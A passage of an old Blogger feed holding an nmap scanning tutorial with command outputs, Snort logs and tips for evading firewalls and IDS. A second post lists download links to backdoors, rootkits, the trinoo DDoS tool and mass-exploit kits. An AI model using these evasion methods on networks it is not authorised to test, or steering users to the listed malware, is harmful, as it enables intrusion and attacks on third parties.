filtered everything except ssh.  Mind you this can still give us some information.&lt;br /&gt;&lt;br /&gt;Issue the following command telnet 192.168.0.4 22&lt;br /&gt;&lt;br /&gt;root@xboxLINUX:~# telnet 192.168.0.4 22&lt;br /&gt;Trying 192.168.0.4...&lt;br /&gt;Connected to 192.168.0.4.&lt;br /&gt;Escape character is '^]'.&lt;br /&gt;SSH-1.99-OpenSSH_3.4p1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We got what version of ssh it is running SSH-1.99-OpenSSH_3.4p1. But that still not enough for even a OS fingerprint, so we need to turn to Stealth FIN, Xmas, or Null scanning. Before i get into details lets get a decent fingerprint on our target 192.168.0.4&lt;br /&gt;&lt;br /&gt;I issued nmap a stealth FIN scan.&lt;br /&gt;&lt;br /&gt;root@xboxLINUX:~# nmap -sF 192.168.0.4&lt;br /&gt;Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )&lt;br /&gt;Interesting ports on (192.168.0.4):&lt;br /&gt;(The 1547 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jackpot with this result we can safely say  that out target is running a firewall due to the fact that the SYN/stealth scan only gave us one open port but the FIN/stealth scan gave us all available open ports. Why does this beat firewalls ? Instead of setting the SYN flag we set a FIN flag and use the exact same method of a half scan, by using this technique and sending a FIN instead we can determine if a port is open by getting a RST packet back, and on a closed port we get no response. You see tcp is designed around rules and there are different rule sets for each communication. The tcp stack is required to responded to FIN packets in this way. Letting us exploit them.&lt;br /&gt;&lt;br /&gt;Ok  i got a windows box firewalled up, lets test it with a FIN.&lt;br /&gt;&lt;br /&gt;root@xboxLINUX:~# nmap -sF 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )&lt;br /&gt;All 1554 scanned ports on (192.168.0.1) are: filtered&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 105 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok nmap is telling us that the windows box is all filtered. The reason is that windows boxes just send a rst pack to every FIN. So even if they are open we still get a rst. So FIN scanning does not work on windows machines. So i go at the windows box with a SYN/stealth scan.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sS 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-20 17:06 EST&lt;br /&gt;Note: Host seems down. If it is really up, but blocking our ping probes, try -P0&lt;br /&gt;Nmap run completed -- 1 IP address (0 hosts up) scanned in 12.206 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now nmap is telling me that the windows box is down ? or blocking our pings. To get around firewalls like this that block incoming ICMP requests disable pinging with the -P0&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -P0 -sS 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 08:39 EST&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1639 ports scanned but not shown below are in state: filtered)&lt;br /&gt;Port State Service&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;1002/tcp open unknown&lt;br /&gt;1025/tcp open NFS-or-IIS&lt;br /&gt;1720/tcp open H.323/Q.931&lt;br /&gt;5000/tcp open UPnP&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 99.125 seconds&lt;br /&gt;&lt;br /&gt;Another thing to note with windows boxes is that usually a SYN/stealth ascanning can get around there lame firewalls. And with some windows firewalls  you can actually crash them with simple TCP()connect scans. I just crashed a sygate firewall when running this scan.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -P0 -sT 192.168.0.1&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 08:43 EST&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1632 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;98/tcp filtered linuxconf&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;389/tcp open ldap&lt;br /&gt;445/tcp open microsoft-ds&lt;br /&gt;528/tcp filtered custix&lt;br /&gt;1002/tcp open unknown&lt;br /&gt;1025/tcp open NFS-or-IIS&lt;br /&gt;1337/tcp open waste&lt;br /&gt;1720/tcp open H.323/Q.931&lt;br /&gt;1995/tcp filtered perf-port&lt;br /&gt;5000/tcp open UPnP&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 293.771 seconds&lt;br /&gt;&lt;br /&gt;Sorry got side tracked there but it is important information when pen-testing a network.&lt;br /&gt;&lt;br /&gt;Now the other 2 scan types will give you the same results, the Xmas scan just turns on 2 extra flags and the null scan has no flags set.&lt;br /&gt;&lt;br /&gt;Snort will log FIN scans. As you can see below.&lt;br /&gt;&lt;br /&gt;Jul 21 13:10:21 192.168.0.4:39290 -&amp;gt; 192.168.0.3:571 FIN *******F&lt;br /&gt;Jul 21 13:10:21 192.168.0.4:39290 -&amp;gt; 192.168.0.3:27007 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39291 -&amp;gt; 192.168.0.3:22 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39291 -&amp;gt; 192.168.0.3:9 FIN *******F&lt;br /&gt;Jul 21 13:10:23 192.168.0.4:39291 -&amp;gt; 192.168.0.3:80 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39290 -&amp;gt; 192.168.0.3:139 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39290 -&amp;gt; 192.168.0.3:515 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39290 -&amp;gt; 192.168.0.3:443 FIN *******F&lt;br /&gt;Jul 21 13:10:22 192.168.0.4:39290 -&amp;gt; 192.168.0.3:9999 FIN *******F&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Snort will identify all nmap scanning techniques, another interesting thing with snort is that it will also log what flags are set in each probe.&lt;br /&gt;&lt;br /&gt;Jul 13 12:31:46 192.168.0.4:54468 -&amp;gt; 192.168.0.3:9 NULL ********&lt;br /&gt;Jul 13 12:31:44 192.168.0.4:54469 -&amp;gt; 192.168.0.3:9 NMAPID **U*P*SF&lt;br /&gt;Jul 13 12:31:44 192.168.0.4:54471 -&amp;gt; 192.168.0.3:1 SYN ******S*&lt;br /&gt;Jul 13 12:31:44 192.168.0.4:54473 -&amp;gt; 192.168.0.3:1 XMAS **U*P**F&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Remeber Xmas scans set 3 flags URG, PUSH and FIN, and Null scans set no flags ?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* -sA Ack scanning, Firewall mapping&lt;br /&gt;&lt;br /&gt;The Ack scan continually sends Ack Acknowledge packets, and is another useful firewall mapping scan, you can successfully scan a firewalled machine for open ports, with that information you can map the firewalls rule sets  and get a understanding of what role this machine plays in the network. Acknowledge packets should get through most firewalls, because as far as non-state full firewall can tell a machine on it's network is requesting a outside connection to the internet because there are ack packets coming in acknowledging there so called syn-ack packets.&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 7.426 seconds&lt;br /&gt;[root@REDHATBOX root]# nmap -sA 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-22 10:51 EST&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1641 ports scanned but not shown below are in state: filtered)&lt;br /&gt;Port State Service&lt;br /&gt;135/tcp UNfiltered loc-srv&lt;br /&gt;1025/tcp UNfiltered NFS-or-IIS&lt;br /&gt;5000/tcp UNfiltered UPnP&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 72.043 seconds&lt;br /&gt;&lt;br /&gt;* -sO IP scanning or internet protocol scanning.&lt;br /&gt;&lt;br /&gt;No major information can be found using IP protocol scans, it just lists what protocols the host supports. But i would avoid this method unless you really need to determine what protocols are in use, most firewalls will not send back ICMP unreachable messages and you will get a massive list of useless protocols that you will not know if they are in use or not. Nmap sends raw ip packets and waits for a ICMP response to determine what protocols are in use.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sO 192.168.0.4&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 09:26 EST&lt;br /&gt;Interesting protocols on 192.168.0.4:&lt;br /&gt;(The 251 protocols scanned but not shown below are in state: closed)&lt;br /&gt;Protocol State Name&lt;br /&gt;1 open icmp&lt;br /&gt;2 open igmp&lt;br /&gt;6 open tcp&lt;br /&gt;17 open udp&lt;br /&gt;255 open unknown&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 13.741 seconds&lt;br /&gt;&lt;br /&gt;1 open icmp (Internet Control Message Protocol)&lt;br /&gt;2 open igmp (Internet Group Management Protocol)&lt;br /&gt;6 open tcp     (Transmission Control Protocol)&lt;br /&gt;17 open udp (User Datagram Protocol)&lt;br /&gt;255 open unknown&lt;br /&gt;&lt;br /&gt;Some machines will give false positives. AIX, HP-UX, Digital UNIX, and Windows machines. You could determine a windows machine with this scan if you had too, considering it will list every possible protocol.&lt;br /&gt;&lt;br /&gt;-I Ident scanning&lt;br /&gt;&lt;br /&gt;Ident scanning list the owners of each process thought a tcp connection. So it's logged and will be filterd by a decent firewall. This scan is usefull for obvious reasons. Exspecialy for hackers, they can determine what services are running as root and target them. Not every service has to be root, so why waste youre time hacking a low level user. In order to get this information we must make a full tcp connection to the machine.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sT -I 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-22 15:11 EST&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;(The 1629 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service                          Owner&lt;br /&gt;9/tcp open discard                          root&lt;br /&gt;13/tcp open daytime                       root&lt;br /&gt;21/tcp open ftp                                 root&lt;br /&gt;22/tcp open ssh                              root&lt;br /&gt;25/tcp open smtp                            root&lt;br /&gt;37/tcp open time                             root&lt;br /&gt;80/tcp open http                              www-data&lt;br /&gt;111/tcp open sunrpc                      daemon&lt;br /&gt;113/tcp open auth                           identd&lt;br /&gt;139/tcp open netbios-ssn             root&lt;br /&gt;443/tcp open https                          root&lt;br /&gt;515/tcp open printer                       root&lt;br /&gt;993/tcp open imaps                       root&lt;br /&gt;995/tcp open pop3s                       root&lt;br /&gt;9999/tcp open abyss                     root&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 9.202 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see there are allot of root processes on this machine, and if we where to exploit anyone of them we would have full access to the entire system. This scan will not work on windows.&lt;br /&gt;&lt;br /&gt;-f Fragmentation scanning&lt;br /&gt;&lt;br /&gt;This method exploits a simple flaw in TCP/IP networks, a fragmented packet is required to be reassembled by the receiving host. This allows us to bypass most packet filters and firewalls unless they queue fragmented packets. Fragmentation scanning can be used with the following scan types, Xmas, Syn, Fin and null. Because this method is not widely used it can cause sniffers and even firewalls to crash or seg fault. Nmap splits the TCP header into several fragments, like dicing up a pizza, the target host then must reassemble them, by using this technique we are trying to totally bypass firewall and fool ids machines.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -f -sS 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-23 11:34 EST&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;(The 1628 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;9/tcp open discard&lt;br /&gt;13/tcp open daytime&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;25/tcp open smtp&lt;br /&gt;37/tcp open time&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;113/tcp open auth&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;443/tcp open https&lt;br /&gt;515/tcp open printer&lt;br /&gt;993/tcp open imaps&lt;br /&gt;995/tcp open pop3s&lt;br /&gt;1241/tcp open msg&lt;br /&gt;9999/tcp open abyss&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 4.343 seconds&lt;br /&gt;&lt;br /&gt;So just add the -f for a fragmentation scan.&lt;br /&gt;&lt;br /&gt;The Fragmentation scan was a great success, it fooled snort into thinking it could have been bad traffic, it was not logged as a scan.&lt;br /&gt;&lt;br /&gt;[**] [1:522:1] MISC Tiny Fragments [**]&lt;br /&gt;[Classification: Potentially Bad Traffic] [Priority: 2]&lt;br /&gt;07/22-13:37:26.450093 192.168.0.4 -&amp;gt; 192.168.0.3&lt;br /&gt;TCP TTL:225 TOS:0x0 ID:59880 IpLen:20 DgmLen:36 MF&lt;br /&gt;Frag Offset: 0x0   Frag Size: 0x10&lt;br /&gt;&lt;br /&gt;[**] [1:522:1] MISC Tiny Fragments [**]&lt;br /&gt;[Classification: Potentially Bad Traffic] [Priority: 2]&lt;br /&gt;07/22-13:37:26.450097 192.168.0.4 -&amp;gt; 192.168.0.3&lt;br /&gt;TCP TTL:225 TOS:0x0 ID:57511 IpLen:20 DgmLen:36 MF&lt;br /&gt;Frag Offset: 0x0   Frag Size: 0x10&lt;br /&gt;&lt;br /&gt;[**] [1:522:1] MISC Tiny Fragments [**]&lt;br /&gt;[Classification: Potentially Bad Traffic] [Priority: 2]&lt;br /&gt;07/22-13:37:26.450101 192.168.0.4 -&amp;gt; 192.168.0.3&lt;br /&gt;TCP TTL:225 TOS:0x0 ID:50069 IpLen:20 DgmLen:36 MF&lt;br /&gt;Frag Offset: 0x0   Frag Size: 0x10&lt;br /&gt;&lt;br /&gt;Fragscan only works with ACK, FIN, Maimon, NULL, SYN, Window, and XMAS scan types&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-O OS fingerprinting&lt;br /&gt;&lt;br /&gt;The -O flag tells nmap to try and calculate what operating system is running. This is one of most useful techniques nmap has to offer. Nmap uses TCP stack fingerprinting, it then compares it's results to a database from that database it can then determine what operating system the host is running. TCP fingerprinting is only one method to determine what OS a specific host is running but this lesson is on nmap so we will discuss TCP fingerprinting. The reason this is possible is every OS has a different implementation of the TCP stack, a windows machine will have different IPID's, sequence numbers and timing than a Linux or BSD machine. Because this involves analyzing the TCP stack you can also source other information from the TCP stack, for example how predictable it's IPID's are, weather or not it's incremental or positive increments, if you find a machine has a incremental stack it might be possible to guess it's responses and spoof a connection. Hackers use OS fingerprinting and database entire networks, and when a new exploit is released they just search through there logs for  target that matches the exploit criteria.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -O -sS 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 09:16 EST&lt;br /&gt;Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1639 ports scanned but not shown below are in state: filtered)&lt;br /&gt;Port State Service&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;1002/tcp open unknown&lt;br /&gt;1025/tcp open NFS-or-IIS&lt;br /&gt;1720/tcp open H.323/Q.931&lt;br /&gt;5000/tcp open UPnP&lt;br /&gt;Device type: general purpose&lt;br /&gt;Running: Microsoft Windows NT/2K/XP&lt;br /&gt;OS details: Microsoft Windows XP Professional RC1+ through final release&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 87.142 seconds&lt;br /&gt;&lt;br /&gt;Nmap successfully identified the operating system as Windows XP Professional, this is valuable information to hackers and pen-testers. Now you can configure your pen- test to target a Windows system.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -O -sS 192.168.0.4&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 09:24 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;Device type: general purpose&lt;br /&gt;Running: Linux 2.4.X|2.5.X&lt;br /&gt;OS details: Linux Kernel 2.4.0 - 2.5.20&lt;br /&gt;Uptime 16.176 days (since Tue Jul 8 05:11:43 2003)&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 16.112 seconds&lt;br /&gt;In this test we get what kernel is running and this lets us know it is linux.&lt;br /&gt;&lt;br /&gt;To get the TCP sequence prediction and IPID you need to include -v (verbose) flag you can even use -vv for even more output from nmap.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -v -O -sS 192.168.0.4&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 11:45 EST&lt;br /&gt;Host 192.168.0.4 appears to be up ... good.&lt;br /&gt;Initiating SYN Stealth Scan against 192.168.0.4 at 11:45&lt;br /&gt;Adding open port 6000/tcp&lt;br /&gt;Adding open port 139/tcp&lt;br /&gt;Adding open port 21/tcp&lt;br /&gt;Adding open port 1024/tcp&lt;br /&gt;Adding open port 111/tcp&lt;br /&gt;Adding open port 23/tcp&lt;br /&gt;Adding open port 22/tcp&lt;br /&gt;The SYN Stealth Scan took 2 seconds to scan 1644 ports.&lt;br /&gt;For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;Device type: general purpose&lt;br /&gt;Running: Linux 2.4.X|2.5.X&lt;br /&gt;OS details: Linux Kernel 2.4.0 - 2.5.20&lt;br /&gt;Uptime 16.274 days (since Tue Jul 8 05:11:43 2003)&lt;br /&gt;TCP Sequence Prediction: Class=random positive increments&lt;br /&gt;Difficulty=2621869 (Good luck!)&lt;br /&gt;IPID Sequence Generation: All zeros&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 14.787 seconds&lt;br /&gt;&lt;br /&gt;Here is the difference in the TCP stack, below is a Windows XP pro machine, it's difficulty is allot easer and is incremental, meaning in theory it is possible to try a TCP sequence attack.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -v -O -sS 192.168.0.1&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 11:50 EST&lt;br /&gt;Host 192.168.0.1 appears to be up ... good.&lt;br /&gt;Initiating SYN Stealth Scan against 192.168.0.1 at 11:50&lt;br /&gt;Adding open port 135/tcp&lt;br /&gt;Adding open port 5000/tcp&lt;br /&gt;Adding open port 1002/tcp&lt;br /&gt;Adding open port 1025/tcp&lt;br /&gt;Adding open port 1720/tcp&lt;br /&gt;adjust_timeout: packet supposedly had rtt of 9020013 microseconds. Ignoring time.&lt;br /&gt;adjust_timeout: packet supposedly had rtt of 9021101 microseconds. Ignoring time.&lt;br /&gt;The SYN Stealth Scan took 71 seconds to scan 1644 ports.&lt;br /&gt;Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port&lt;br /&gt;For OSScan assuming that port 135 is open and port 38216 is closed and neither are firewalled&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1639 ports scanned but not shown below are in state: filtered)&lt;br /&gt;Port State Service&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;1002/tcp open unknown&lt;br /&gt;1025/tcp open NFS-or-IIS&lt;br /&gt;1720/tcp open H.323/Q.931&lt;br /&gt;5000/tcp open UPnP&lt;br /&gt;Device type: general purpose&lt;br /&gt;Running: Microsoft Windows NT/2K/XP&lt;br /&gt;OS details: Microsoft Windows XP Professional RC1+ through final release&lt;br /&gt;TCP Sequence Prediction: Class=random positive increments&lt;br /&gt;Difficulty=23841 (Worthy challenge)&lt;br /&gt;IPID Sequence Generation: Incremental&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 85.411 seconds&lt;br /&gt;&lt;br /&gt;-iR randomize hosts&lt;br /&gt;&lt;br /&gt;I like this option, i think of it as trawling. Nmap just picks random hosts and scans them. It's not as direct as scanning subnets but you can discover some cool networks. And thats what nmap is all about, discovering networks.  &lt;br /&gt;&lt;br /&gt;Host 217.227.180.44 appears to be down, skipping it.&lt;br /&gt;Host 183.221.113.67 appears to be down, skipping it.&lt;br /&gt;Host 210.143.252.40 appears to be down, skipping it.&lt;br /&gt;Host 49.233.209.60 appears to be down, skipping it.&lt;br /&gt;Host 188.131.254.141 appears to be down, skipping it.ng it.&lt;br /&gt;Host 190.52.101.229 appears to be down, skipping it.&lt;br /&gt;If you look at the above address you can see how nmap just randomly picks hosts and scans them. If you wanted you could do this forever on youre networks. Everytime the connection drops out just do --resume (logfile). And run it as a background process.&lt;br /&gt;&lt;br /&gt;There is another way to randomize nmap scans with the --randomize_hosts &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-iL read targets from file.&lt;br /&gt;&lt;br /&gt;If you have youre networks or Wlan mapped out into a file, give nmap the -iL flag and it will read host names from that file and begin scanning them.&lt;br /&gt;&lt;br /&gt;-F Fast scan&lt;br /&gt;&lt;br /&gt;Only scans for know services, instead of scanning all 65535 it only scans 1190 and decreases scan times greatly.&lt;br /&gt;&lt;br /&gt;-p Specify Ports&lt;br /&gt;&lt;br /&gt;Even better if you are scanning for rouge web servers or something you only have to scan for ports 80,443. You can specify the ports like so.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -p 22,21 -sT 192.168.0.4&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 12:09 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 10.252 seconds&lt;br /&gt;&lt;br /&gt;Here we just scanned for ssh and ftp. For more options you can try 21,22,80-200&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -p 21,22,80-200 -sT 192.168.0.4&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 12:11 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 119 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 8.128 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So we scanned for ftp,ssh and every open port from 80-200.&lt;br /&gt;&lt;br /&gt;Nmap scan logs.&lt;br /&gt;&lt;br /&gt;You can log nmap scans in 4 different formats.&lt;br /&gt;&lt;br /&gt;-oN logs nmap scans in human readable format.&lt;br /&gt;-oX logs nmap scans in XML format.&lt;br /&gt;-oG logs nmap scans in grepable format&lt;br /&gt;-oS logs nmap scans in script kiddie format.&lt;br /&gt;-oA logs nmap scans in all of the above formats except script kiddie.&lt;br /&gt;&lt;br /&gt;here is the script kiddie log format. Not recommended.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX test]# cat kiddie&lt;br /&gt;&lt;br /&gt;StartIng nmap 3.30 ( HttP://www.|ns3cUre.0rg/nmAp/ ) At 2003-07-24 13:39 e$T&lt;br /&gt;!nt3R3$t|ng pOrTz 0n 192.168.0.4:&lt;br /&gt;(TH3 1637 Portz $canN3d but n0t $hOwn b3l0w ArE iN $TAt3: cl0s3d)&lt;br /&gt;P0rT $tate s3rVIcE&lt;br /&gt;21/tcp 0p3n ftp&lt;br /&gt;22/tcp oP3N $$h&lt;br /&gt;23/Tcp Open t3lnEt&lt;br /&gt;111/tcp 0p3n sunrpc&lt;br /&gt;139/tcp 0pEn n3tbioz-$$n&lt;br /&gt;1024/tCp opEn kdm&lt;br /&gt;6000/tcP op3n X11&lt;br /&gt;&lt;br /&gt;nmap run c0mpl3ted -- 1 |P adDr3sz (1 h0St up) scannEd |n 8.570 $3conDs&lt;br /&gt;&lt;br /&gt;this is my preferred logging method with nmap.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX test]# nmap -oA test -sT 192.168.0.4;ls&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 14:43 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 7.713 seconds&lt;br /&gt;kiddie test.gnmap test.nmap test.xml&lt;br /&gt;&lt;br /&gt;resume your scan by specifying the following flag in nmap --resume logfile. &lt;br /&gt;&lt;br /&gt;Nmapfe Nmap front end.&lt;br /&gt;&lt;br /&gt;The nmap front end is a gui version of the nmap scanner for *nix variants. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nmap for windows&lt;br /&gt;&lt;br /&gt;We have focused the major part of this lesson on nmap for linux, but there is a windows version that is capable of the same functionality as the linux version. The windows version is allot slower than the linux version but apart from that it is very capable.&lt;/zombie&gt;&lt;/ftp&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933673072765793?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933673072765793/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933673072765793&amp;isPopup=true' title='3 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933673072765793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933673072765793'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/nmap-tutor-bab-i.html' title='NMAP TUTOR ++  BAB I'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933661761887130</id><published>2005-02-25T20:02:00.000+07:00</published><updated>2005-02-25T20:03:37.620+07:00</updated><title type='text'>tools hacking</title><content type='html'>from my friends&lt;br /&gt;&lt;br /&gt;toolss&lt;br /&gt;&lt;br /&gt;http://www.gohanz.com/tools.htm&lt;br /&gt;http://brutalside.host.sk/&lt;br /&gt;http://www.gohanz.com/tutor.htm&lt;br /&gt;http://brutalside.host.sk/tools/ftp.tgz&lt;br /&gt;http://brutalside.host.sk/tools/lame.tgz&lt;br /&gt;http://brutalside.host.sk/tools/massplo.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/massplor.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/trinoo.tgz&lt;br /&gt;&lt;br /&gt;This is my favorites backdoor &lt;br /&gt;http://brutalside.host.sk/tools/tk8.tar.gz&lt;br /&gt;http://www.geocities.com/brutalside/backdoor/tk8.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/trojanit.tar.gz&lt;br /&gt;http://www.geocities.com/brutalside/backdoor/trojanit.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/shv4.tar.gz&lt;br /&gt;http://www.geocities.com/brutalside/backdoor/shv4.tar.gz&lt;br /&gt;http://brutalside.host.sk/tools/term&lt;br /&gt;&lt;br /&gt;This is my misc tools&lt;br /&gt;http://brutalside.host.sk/tools/psyBNC2%255B1%255D.2.1-linux-i86-static.tar.gz&lt;br 